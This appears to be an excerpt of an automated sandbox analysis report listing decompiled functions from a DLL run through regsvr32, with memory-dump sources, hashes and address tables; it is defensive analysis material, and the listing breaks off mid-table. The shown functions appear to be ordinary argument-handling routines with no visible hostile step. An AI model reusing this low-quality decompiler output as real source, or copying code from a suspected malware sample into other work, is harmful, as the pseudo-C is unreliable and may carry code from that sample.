                                                                      0x18001ef9d
                                                                      0x18001ef9f
                                                                      0x18001efa5
                                                                      0x18001efa8
                                                                      0x18001efad
                                                                      0x18001efb1
                                                                      0x18001efb8
                                                                      0x18001efbe
                                                                      0x18001efc3
                                                                      0x18001efc8
                                                                      0x18001efcf
                                                                      0x18001efdf
                                                                      0x18001efe1
                                                                      0x18001efeb
                                                                      0x18001efef
                                                                      0x18001eff7
                                                                      0x18001eff9
                                                                      0x18001efff
                                                                      0x18001f003
                                                                      0x18001f006
                                                                      0x18001f00c
                                                                      0x18001f00e
                                                                      0x18001f012
                                                                      0x18001f018
                                                                      0x18001f022
                                                                      0x18001f024
                                                                      0x18001f028
                                                                      0x18001f02b
                                                                      0x18001f032
                                                                      0x18001f036
                                                                      0x18001f03d
                                                                      0x18001f041
                                                                      0x18001f046
                                                                      0x18001f04b
                                                                      0x18001f050
                                                                      0x18001f05c
                                                                      0x18001f06a

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65f3ba26ec9f91716d7d08011faf70534c9186604ac1b1796ffa3a1d08209a3a
                                                                      • Instruction ID: 04d47891736a4bf8a56ab8bc831563a0bae1b93b6163bc39d398bb57386fb1e1
                                                                      • Opcode Fuzzy Hash: 65f3ba26ec9f91716d7d08011faf70534c9186604ac1b1796ffa3a1d08209a3a
                                                                      • Instruction Fuzzy Hash: 9E318473209B8885EB668F29D4403AD7BA0E39DB9CF258125EB8D4B752CF36C556DB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180024F6C(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80024f97;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80025066;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80024fd8;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80025068;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80025058;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80025014;
                                                                      				 *_t71 = 2;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80025068;
                                                                      				_v24 = _t43;
                                                                      				r8d = 2;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180010A8C(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x8002500c;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8002500f;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180024f6c
                                                                      0x180024f7d
                                                                      0x180024f80
                                                                      0x180024f82
                                                                      0x180024f87
                                                                      0x180024f8f
                                                                      0x180024f92
                                                                      0x180024fa1
                                                                      0x180024fa3
                                                                      0x180024fa9
                                                                      0x180024fac
                                                                      0x180024fb1
                                                                      0x180024fb5
                                                                      0x180024fbc
                                                                      0x180024fc2
                                                                      0x180024fc7
                                                                      0x180024fcc
                                                                      0x180024fd3
                                                                      0x180024fe3
                                                                      0x180024fe5
                                                                      0x180024fef
                                                                      0x180024ff4
                                                                      0x180024ffc
                                                                      0x180024ffe
                                                                      0x180025004
                                                                      0x180025009
                                                                      0x18002500c
                                                                      0x180025012
                                                                      0x180025014
                                                                      0x180025018
                                                                      0x18002501e
                                                                      0x180025028
                                                                      0x18002502a
                                                                      0x18002502e
                                                                      0x180025031
                                                                      0x180025038
                                                                      0x18002503c
                                                                      0x180025043
                                                                      0x180025047
                                                                      0x18002504c
                                                                      0x180025051
                                                                      0x180025056
                                                                      0x180025063
                                                                      0x180025072

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bcd9a4d74501d778bc06eb8b75c68725fd94772939e98c189726f0a3ca85962c
                                                                      • Instruction ID: d772ea8a27d6e4ae216a39daea13e7bf64e3c564ebfa03b98e57813d33beb5a3
                                                                      • Opcode Fuzzy Hash: bcd9a4d74501d778bc06eb8b75c68725fd94772939e98c189726f0a3ca85962c
                                                                      • Instruction Fuzzy Hash: 8331A172204B48C6EBA28F19D4803AD77A0F38DF88F648125DB8C0B351DF36C156CB08
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001AFA8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001afd3;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x8001b0a0;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001b014;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001b0a2;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001b092;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001b04e;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001b0a2;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E00000001180015A5C(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001b046;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001b049;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x18001afa8
                                                                      0x18001afb9
                                                                      0x18001afbc
                                                                      0x18001afbe
                                                                      0x18001afc3
                                                                      0x18001afcb
                                                                      0x18001afce
                                                                      0x18001afdd
                                                                      0x18001afdf
                                                                      0x18001afe5
                                                                      0x18001afe8
                                                                      0x18001afed
                                                                      0x18001aff1
                                                                      0x18001aff8
                                                                      0x18001affe
                                                                      0x18001b003
                                                                      0x18001b008
                                                                      0x18001b00f
                                                                      0x18001b01f
                                                                      0x18001b021
                                                                      0x18001b02b
                                                                      0x18001b02f
                                                                      0x18001b037
                                                                      0x18001b039
                                                                      0x18001b03f
                                                                      0x18001b043
                                                                      0x18001b046
                                                                      0x18001b04c
                                                                      0x18001b04e
                                                                      0x18001b052
                                                                      0x18001b058
                                                                      0x18001b062
                                                                      0x18001b064
                                                                      0x18001b068
                                                                      0x18001b06b
                                                                      0x18001b072
                                                                      0x18001b076
                                                                      0x18001b07d
                                                                      0x18001b081
                                                                      0x18001b086
                                                                      0x18001b08b
                                                                      0x18001b090
                                                                      0x18001b09d
                                                                      0x18001b0ac

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction ID: 94ad08d480814320de64b32cccd37a19e0672717889eaf2a288759deddd86cd7
                                                                      • Opcode Fuzzy Hash: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction Fuzzy Hash: 9431A472214B88C6EB668F29D4503AE77A4F38DB8CF158125DB9C4B351DF36C556D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001D018(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001d043;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x8001d110;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001d084;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001d112;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001d102;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001d0be;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001d112;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E0000000118000E818(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001d0b6;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001d0b9;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x18001d018
                                                                      0x18001d029
                                                                      0x18001d02c
                                                                      0x18001d02e
                                                                      0x18001d033
                                                                      0x18001d03b
                                                                      0x18001d03e
                                                                      0x18001d04d
                                                                      0x18001d04f
                                                                      0x18001d055
                                                                      0x18001d058
                                                                      0x18001d05d
                                                                      0x18001d061
                                                                      0x18001d068
                                                                      0x18001d06e
                                                                      0x18001d073
                                                                      0x18001d078
                                                                      0x18001d07f
                                                                      0x18001d08f
                                                                      0x18001d091
                                                                      0x18001d09b
                                                                      0x18001d09f
                                                                      0x18001d0a7
                                                                      0x18001d0a9
                                                                      0x18001d0af
                                                                      0x18001d0b3
                                                                      0x18001d0b6
                                                                      0x18001d0bc
                                                                      0x18001d0be
                                                                      0x18001d0c2
                                                                      0x18001d0c8
                                                                      0x18001d0d2
                                                                      0x18001d0d4
                                                                      0x18001d0d8
                                                                      0x18001d0db
                                                                      0x18001d0e2
                                                                      0x18001d0e6
                                                                      0x18001d0ed
                                                                      0x18001d0f1
                                                                      0x18001d0f6
                                                                      0x18001d0fb
                                                                      0x18001d100
                                                                      0x18001d10d
                                                                      0x18001d11c

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction ID: 5bde38476f7eaa3e68849bfca4189d5a0969d139185ba29268053c47b699e18b
                                                                      • Opcode Fuzzy Hash: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction Fuzzy Hash: 05318472608B88C5EB668F29D4413AD77A0F39DB8CF158116DB8D4B751CF36C556D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180025074(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8002509f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x8002516e;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800250e0;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80025170;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80025160;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8002511c;
                                                                      				 *_t71 = 2;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80025170;
                                                                      				_v24 = _t43;
                                                                      				r8d = 2;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180010A8C(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80025114;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80025117;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180025074
                                                                      0x180025085
                                                                      0x180025088
                                                                      0x18002508a
                                                                      0x18002508f
                                                                      0x180025097
                                                                      0x18002509a
                                                                      0x1800250a9
                                                                      0x1800250ab
                                                                      0x1800250b1
                                                                      0x1800250b4
                                                                      0x1800250b9
                                                                      0x1800250bd
                                                                      0x1800250c4
                                                                      0x1800250ca
                                                                      0x1800250cf
                                                                      0x1800250d4
                                                                      0x1800250db
                                                                      0x1800250eb
                                                                      0x1800250ed
                                                                      0x1800250f7
                                                                      0x1800250fc
                                                                      0x180025104
                                                                      0x180025106
                                                                      0x18002510c
                                                                      0x180025111
                                                                      0x180025114
                                                                      0x18002511a
                                                                      0x18002511c
                                                                      0x180025120
                                                                      0x180025126
                                                                      0x180025130
                                                                      0x180025132
                                                                      0x180025136
                                                                      0x180025139
                                                                      0x180025140
                                                                      0x180025144
                                                                      0x18002514b
                                                                      0x18002514f
                                                                      0x180025154
                                                                      0x180025159
                                                                      0x18002515e
                                                                      0x18002516b
                                                                      0x18002517a

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bcd9a4d74501d778bc06eb8b75c68725fd94772939e98c189726f0a3ca85962c
                                                                      • Instruction ID: 371edf38ed368edf4ef0fd981c051053526ba8f4928210db6574101770edb3d1
                                                                      • Opcode Fuzzy Hash: bcd9a4d74501d778bc06eb8b75c68725fd94772939e98c189726f0a3ca85962c
                                                                      • Instruction Fuzzy Hash: 3F318F72214B4886EB628F29D4413AD77A0F38DF88F648125DB8C0B751DF36C566CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001D120(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001d14b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x8001d218;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001d18c;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001d21a;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001d20a;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001d1c6;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001d21a;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E0000000118000E818(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001d1be;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001d1c1;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x18001d120
                                                                      0x18001d131
                                                                      0x18001d134
                                                                      0x18001d136
                                                                      0x18001d13b
                                                                      0x18001d143
                                                                      0x18001d146
                                                                      0x18001d155
                                                                      0x18001d157
                                                                      0x18001d15d
                                                                      0x18001d160
                                                                      0x18001d165
                                                                      0x18001d169
                                                                      0x18001d170
                                                                      0x18001d176
                                                                      0x18001d17b
                                                                      0x18001d180
                                                                      0x18001d187
                                                                      0x18001d197
                                                                      0x18001d199
                                                                      0x18001d1a3
                                                                      0x18001d1a7
                                                                      0x18001d1af
                                                                      0x18001d1b1
                                                                      0x18001d1b7
                                                                      0x18001d1bb
                                                                      0x18001d1be
                                                                      0x18001d1c4
                                                                      0x18001d1c6
                                                                      0x18001d1ca
                                                                      0x18001d1d0
